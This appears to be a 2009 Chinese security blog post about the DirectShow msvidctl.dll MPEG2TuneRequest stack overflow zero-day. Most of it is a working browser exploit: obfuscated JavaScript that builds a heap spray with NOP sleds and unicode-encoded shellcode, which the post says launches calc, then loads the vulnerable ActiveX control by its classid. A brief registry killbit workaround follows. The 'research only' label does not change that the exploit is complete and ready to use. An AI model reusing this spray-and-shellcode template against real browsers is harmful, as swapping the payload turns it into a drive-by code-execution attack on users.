夜火博客

DirectShow MPEG2TuneRequest 远程堆栈溢出漏洞利用程序Exploit+漏洞临时补丁

2009-07-07
漏洞信息
缓冲区溢出
exploit
漏洞信息
0day
2分钟
259字

DirectShow 0DAY出过一波,不过夜火我没太去注意,这波0DAY与第一波的DirectShow 0DAY 不同,这次的漏洞是DirectShow相关msvidctl.dll组件解析畸形MPEG2视频格式文件触发溢出,攻击者可以使用普通的javascript堆喷射方式远程执行任意代码。

Microsoft DirectShow MPEG2TuneRequest 存在可被远程利用的堆栈溢出漏洞

关键代码如下: -------------------------以下内容有危险,仅为研究使用--------------

1
var appllaa='0';
2
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
3
var dashell=unescape(nndx+"%u03eb%ueb59%ue805%ufff8%uffff%u4937%u4949%u4949%u4949%u4949" +
4
"%u4949%u4949%u4949%u4949%u5a51%u456a%u5058%u4230%u4130%u416b" +
5
"%u5541%u4132%u3242%u4242%u4142%u4230%u5841%u3850%u4241%u7875" +
6
"%u7969%u6d6c%u3038%u6544%u7550%u7350%u6e30%u516b%u7755%u4c4c" +
7
"%u414b%u656c%u3355%u4348%u3831%u4c6f%u304b%u464f%u4c78%u314b" +
8
"%u374f%u3450%u4a41%u624b%u4e69%u666b%u6e54%u666b%u6a61%u304e" +
9
"%u3931%u4f50%u4c69%u6f6c%u5974%u3450%u3534%u5957%u7951%u565a" +
10
"%u776d%u6f71%u7832%u6b6b%u6744%u714b%u6744%u7754%u3474%u4b35" +
11
"%u6e55%u436b%u466f%u6544%u3851%u506b%u4c66%u564b%u306c%u4c4b" +
12
"%u414b%u374f%u656c%u5a51%u6c4b%u654b%u4c4c%u674b%u6871%u6e6b" +
13
"%u7169%u654c%u6674%u5964%u4653%u4951%u6550%u6c34%u634b%u3470" +
14
"%u4b70%u4b35%u5470%u3438%u6e4c%u436b%u6670%u4e6c%u626b%u7550" +
15
"%u4c4c%u6e6d%u536b%u3758%u4a78%u554b%u4c59%u6d4b%u6e50%u6550" +
22 collapsed lines
16
"%u6550%u4750%u6c70%u434b%u6558%u716c%u464f%u5a51%u4156%u3070" +
17
"%u4d56%u6c59%u4e38%u4963%u7150%u526b%u7570%u7138%u4b6e%u4b68" +
18
"%u3152%u6563%u4c38%u5958%u6e6e%u746a%u714e%u4b47%u7a4f%u7047" +
19
"%u6363%u5251%u634c%u5553%u4550");
20
var headersize=20;
21
var omybro=unescape(nndx);
22
var slackspace=headersize+dashell.length;
23
while(omybro.length<slackspace)
24
omybro+=omybro;
25
bZmybr=omybro.substring(0,slackspace);
26
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
27
while(shuishiMVP.length+slackspace<0x30000)
28
shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;
29
memory=new Array();
30
for(x=0;x<300;x++)
31
memory[x]=shuishiMVP+dashell;
32
var myObject=document.createElement('object');
33
DivID.appendChild(myObject);
34
myObject.width='1';
35
myObject.height='1';
36
myObject.data='./logo.gif';
37
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';

该shellcode会执行calc。

感谢代码分享者:咖啡。 感谢漏洞遗失者:这里是马赛克 来源:Xeye

===================漏洞临时解决补丁===================

KillBit相关组件,将以下内容保存为.reg文件双击导入即可

1
Windows Registry Editor Version 5.00
2
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerActiveX Compatibility{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
3
"Compatibility Flags"=dword:00000400

补丁来源:80SEC非官方八卦BLOG

UCOMO网络分享 - 支持免费音乐外链的网站
使用ASP将文件打包为XML文件(带解包)
本文标题:DirectShow MPEG2TuneRequest 远程堆栈溢出漏洞利用程序Exploit+漏洞临时补丁
文章作者:夜火
发布时间:2009-07-07
Copyright 2007-2025
  夜火博客
站点地图
夜火笔记
CloudFlare Batch 批量解析域名